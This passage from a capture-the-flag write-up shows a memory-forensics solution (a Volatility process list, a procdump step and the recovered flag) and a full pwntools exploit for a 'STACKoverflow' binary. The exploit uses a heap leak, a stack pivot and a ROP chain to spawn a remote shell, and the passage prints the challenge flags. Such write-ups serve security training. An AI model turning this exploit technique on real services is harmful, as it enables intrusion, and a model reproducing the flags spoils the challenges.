0xffffe001dde75080 svchost.exe             804    732     20        0      0      0 2023-03-03 08:50:01 UTC+0000                                 
0xffffe001dde84840 svchost.exe             836    732      9        0      0      0 2023-03-03 08:50:02 UTC+0000                                 
0xffffe001ddecc080 dwm.exe                 932    672      8        0      1      0 2023-03-03 08:50:02 UTC+0000                                 
0xffffe001ddf1b080 svchost.exe             508    732     71        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf2b540 svchost.exe               8    732     22        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf30840 svchost.exe             544    732     24        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf45840 svchost.exe             728    732     31        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddf4d840 svchost.exe             792    732     16        0      0      0 2023-03-03 08:50:03 UTC+0000                                 
0xffffe001ddfe6840 svchost.exe            1224    732     23        0      0      0 2023-03-03 08:50:04 UTC+0000                                 
0xffffe001de0516c0 spoolsv.exe            1436    732     10        0      0      0 2023-03-03 08:50:04 UTC+0000                                 
0xffffe001de0a8680 svchost.exe            1460    732     28        0      0      0 2023-03-03 08:50:05 UTC+0000                                 
0xffffe001de1275c0 rundll32.exe           1624    508      1        0      0      0 2023-03-03 08:50:05 UTC+0000                                 
0xffffe001de18a840 dasHost.exe            1812    792      9        0      0      0 2023-03-03 08:50:06 UTC+0000                                 
0xffffe001de1d1080 svchost.exe            1844    732     11        0      0      0 2023-03-03 08:50:06 UTC+0000                                 
0xffffe001de258540 svchost.exe            2020    732      6        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de2d2340 vm3dservice.ex         1276    732      2        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de304580 VGAuthService.         1792    732      2        0      0      0 2023-03-03 08:50:08 UTC+0000                                 
0xffffe001de374480 vmtoolsd.exe           1948    732     13        0      0      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de2e2080 vm3dservice.ex         2092   1276      2        0      1      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de3a5840 MsMpEng.exe            2156    732     38        0      0      0 2023-03-03 08:50:09 UTC+0000                                 
0xffffe001de492840 WmiPrvSE.exe           2340    804      9        0      0      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de1e0640 sihost.exe             2348    508     11        0      1      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de4c6840 taskhostw.exe          2372    508     13        0      1      0 2023-03-03 08:50:12 UTC+0000                                 
0xffffe001de513840 dllhost.exe            2508    732     14        0      0      0 2023-03-03 08:50:13 UTC+0000                                 
0xffffe001dd1d8600 CompatTelRunne         2856   1624      6        0      0      0 2023-03-03 08:50:19 UTC+0000                                 
0xffffe001dc433080 msdtc.exe              2908    732     12        0      0      0 2023-03-03 08:50:22 UTC+0000                                 
0xffffe001de6bf840 userinit.exe            832    672      0 --------      1      0 2023-03-03 08:50:24 UTC+0000                                 
0xffffe001de6df840 explorer.exe           1604    832     40        0      1      0 2023-03-03 08:50:24 UTC+0000                                 
0xffffe001de240840 RuntimeBroker.         2644    804     15        0      1      0 2023-03-03 08:50:25 UTC+0000                                 
0xffffe001de7b6840 NisSrv.exe             3156    732      8        0      0      0 2023-03-03 08:50:27 UTC+0000                                 
0xffffe001de85a840 SearchIndexer.         3288    732     16        0      0      0 2023-03-03 08:50:28 UTC+0000                                 
0xffffe001de8d7840 ShellExperienc         3504    804     19        0      1      0 2023-03-03 08:50:29 UTC+0000                                 
0xffffe001de671840 SearchUI.exe           3624    804     23        0      1      0 2023-03-03 08:50:30 UTC+0000                                 
0xffffe001dea59840 WmiPrvSE.exe           3728    804     10        0      0      0 2023-03-03 08:50:31 UTC+0000                                 
0xffffe001de4af080 vmtoolsd.exe           4228   1604      8        0      1      0 2023-03-03 08:50:44 UTC+0000                                 
0xffffe001de4c5080 OneDrive.exe           4384   1604     21        0      1      1 2023-03-03 08:50:47 UTC+0000                                 
0xffffe001dec1a080 ApplicationFra         4660    804      7        0      1      0 2023-03-03 08:50:53 UTC+0000                                 
0xffffe001ded6a840 MicrosoftEdge.         4756    804     33        0      1      0 2023-03-03 08:50:54 UTC+0000                                 
0xffffe001dee4b840 browser_broker         4804    804      9        0      1      0 2023-03-03 08:50:55 UTC+0000                                 
0xffffe001def1b840 MicrosoftEdgeC         4152   2644     27        0      1      0 2023-03-03 08:51:05 UTC+0000                                 
0xffffe001ddf81080 svchost.exe            1448    732      3        0      1      0 2023-03-03 08:52:12 UTC+0000                                 
0xffffe001de59b840 taskeng.exe            3808    508      4        0      1      0 2023-03-03 08:52:13 UTC+0000                                 
0xffffe001dd9f5080 MicrosoftEdgeC         1016   2644     42        0      1      0 2023-03-03 08:52:17 UTC+0000                                 
0xffffe001de7d3840 WmiApSrv.exe           1580    732      4        0      0      0 2023-03-03 08:53:33 UTC+0000                                 
0xffffe001de4f2380 SearchProtocol         4280   3288      6        0      1      0 2023-03-03 08:54:54 UTC+0000                                 
0xffffe001decf3080 taskhostw.exe           984    508      7        0      1      0 2023-03-03 08:55:14 UTC+0000                                 
0xffffe001de003080 MicrosoftEdgeC         2460   2644      9        0      1      0 2023-03-03 08:55:40 UTC+0000                                 
0xffffe001dec90840 MicrosoftEdgeC         5904   2644     23        0      1      0 2023-03-03 08:56:07 UTC+0000                                 
0xffffe001de75e080 MicrosoftEdgeC         6056   2644     38        0      1      0 2023-03-03 08:56:21 UTC+0000                                 
0xffffe001df58b080 SearchProtocol         3416   3288      7        0      0      0 2023-03-03 08:57:01 UTC+0000                                 
0xffffe001dea1f840 SearchFilterHo         1584   3288      5        0      0      0 2023-03-03 08:57:01 UTC+0000                                 
0xffffe001dd5ca080 MpCmdRun.exe           3996   4936      7        0      0      0 2023-03-03 08:57:02 UTC+0000                                 
0xffffe001dd5ae080 WOW.exe                4024   4804      3        0      1      1 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dd57d080 conhost.exe            5296   4024      3        0      1      0 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dedbb840 audiodg.exe            4928    544      9        0      0      0 2023-03-03 08:57:14 UTC+0000                                 
0xffffe001dd5f8840 cmd.exe                5224   1948      0 --------      0      0 2023-03-03 08:57:18 UTC+0000                                 
0xffffe001dd57f840 conhost.exe            3836   5224      0 --------      0      0 2023-03-03 08:57:18 UTC+0000

python2 vol.py -f /home/kali/Downloads/ctf/incognito/wow/WOW.vmem --profile=Win10x64_10240_17770 procdump -D ./ -p 4024

strings *

result ->

m3m0ry_f0r3ns1c_1s_am4z1ng

guess ->

INCO{m3m0ry_f0r3ns1c_1s_am4z1ng}

11. STACKoverflow

 

rop chaining + stack pivoting

from pwn import *

#p = process('STACKoverflow')
p = remote('ctf.incognito.kr', 50001)
e = ELF('STACKoverflow')
libc = ELF('libc.so.6')

def Question(question):
    p.sendlineafter(b'>', b'1')
    if len(question) == 0x20:
        p.sendafter(b'>', question)
    else:
        p.sendlineafter(b'>', question)
def Answer(num, answer, more):
    p.sendlineafter(b'>', b'2')
    p.sendlineafter(b'>', str(num))
    if len(answer) == 0x20:
        p.sendafter(b'>', answer)
    else:
        p.sendlineafter(b'>', answer)
    if len(more) == 0x60:
        p.sendafter(b'>', more)
    else:
        p.sendlineafter(b'>', more)

pop_rdi = 0x00000000004016e5
leave_ret = 0x401688
ret = 0x000000000040101a

Question(b'A' * 0x20)
Question(b'A' * 0x20)

Answer(2, b'A' * 0x20, b'')

Question(b'A' * 0x20)

p.sendlineafter(b'>', b'2')
print(p.recvuntil(b'A' * 0x40))
heap_leak = u64(p.recvuntil(b'2.')[:-2].ljust(8, b'\x00'))
print(hex(heap_leak))

p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'2')
p.sendlineafter(b'>', b'')

#gdb.attach(p, 'b *0x401688\nb*0x40165B\n')
#pause()

Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)
Question(b'A' * 0x20)

Question(b'A' * 0x18 + p64(heap_leak + 0x60 + 0x50*3*6+0x8))
Question(b'A' * 0x20)

Answer(6, p64(pop_rdi) + p64(e.got['puts']) + p64(e.plt['puts']) + p64(0x40165B), b'A' * 0x50 + p64(heap_leak - 0x30 - 0x8 + 0x50 + 0x50*3*6) + p64(leave_ret))

libc_base = u64(p.recvline()[:-1].ljust(8, b'\x00')) - libc.symbols['puts']
og = [0x50a37, 0xebcf1, 0xebcf5, 0xebcf8]
one_gadget = libc_base + og[0]
print(hex(one_gadget))
system_addr = libc_base + libc.symbols['system']
binsh = libc_base + next(libc.search(b'/bin/sh\x00'))

p.send(p64(ret) * (0x60//8-3) + p64(pop_rdi) + p64(binsh) + p64(system_addr))

p.interactive()
#INCO{"WH4T_A_N1C3_WE4THER_I5!"}

 

 

Comments